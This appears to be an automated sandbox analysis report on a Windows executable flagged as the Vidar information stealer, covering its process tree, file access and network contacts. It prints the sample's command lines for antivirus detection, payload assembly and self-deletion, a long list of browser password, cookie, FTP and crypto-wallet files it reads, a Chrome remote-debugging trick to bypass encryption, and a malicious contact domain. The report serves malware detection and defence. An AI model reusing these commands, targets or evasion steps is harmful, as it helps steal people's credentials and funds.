Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior

Source: 6xlx4w.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 6xlx4w.13.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 6xlx4w.13.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: msedge.exe, 00000015.00000003.2903482976.000002E400384000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 6xlx4w.13.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 6xlx4w.13.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 6xlx4w.13.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6684V5n83w.exe, 00000000.00000002.2178884292.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e69g
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6xlx4w.13.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6xlx4w.13.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msedge.exe, 00000015.00000002.2982111288.000001EDF3A43000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 6xlx4w.13.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 6xlx4w.13.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6xlx4w.13.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 6xlx4w.13.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 6xlx4w.13.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6684V5n83w.exe, 00000000.00000002.2178884292.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 6xlx4w.13.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6xlx4w.13.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6xlx4w.13.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 6xlx4w.13.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 6xlx4w.13.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 330775	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Modules	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "however" Hotel	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com Evans.com l	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: Evans.com, 0000000D.00000000.2217240746.0000000000B83000.00000002.00000001.01000000.00000007.sdmp, Evans.com.2.dr, Entities.9.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\6684V5n83w.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	12 Process Injection	111 Masquerading	2 OS Credential Dumping	1 Query Registry	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	11 Input Capture	1 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	3 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	15 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6684V5n83w.exe	24%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://msn.comXIDv100o	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
sdoout.lol	116.203.14.4	true	true	unknown
plus.l.google.com	216.58.206.46	true	false	high
play.google.com	142.250.186.46	true	false	high
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.38	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.186.164	true	false	high
googlehosted.l.googleusercontent.com	172.217.16.129	true	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
EAXdwMrdIdPn.EAXdwMrdIdPn	unknown	unknown	false	unknown
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634793754&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://sb.scorecardresearch.com/b?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
https://t.me/w211et	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	false		high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/)	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/(	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com//	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/3	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/2	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/oauth2/v2/tokeninfo	msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/0	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ntp.msn.com/0	000003.log9.23.dr	false		high
https://docs.google.com/document/J	chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	aieukn.13.dr	false		high
https://issuetracker.google.com/284462263	msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/:	chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmp	false		high
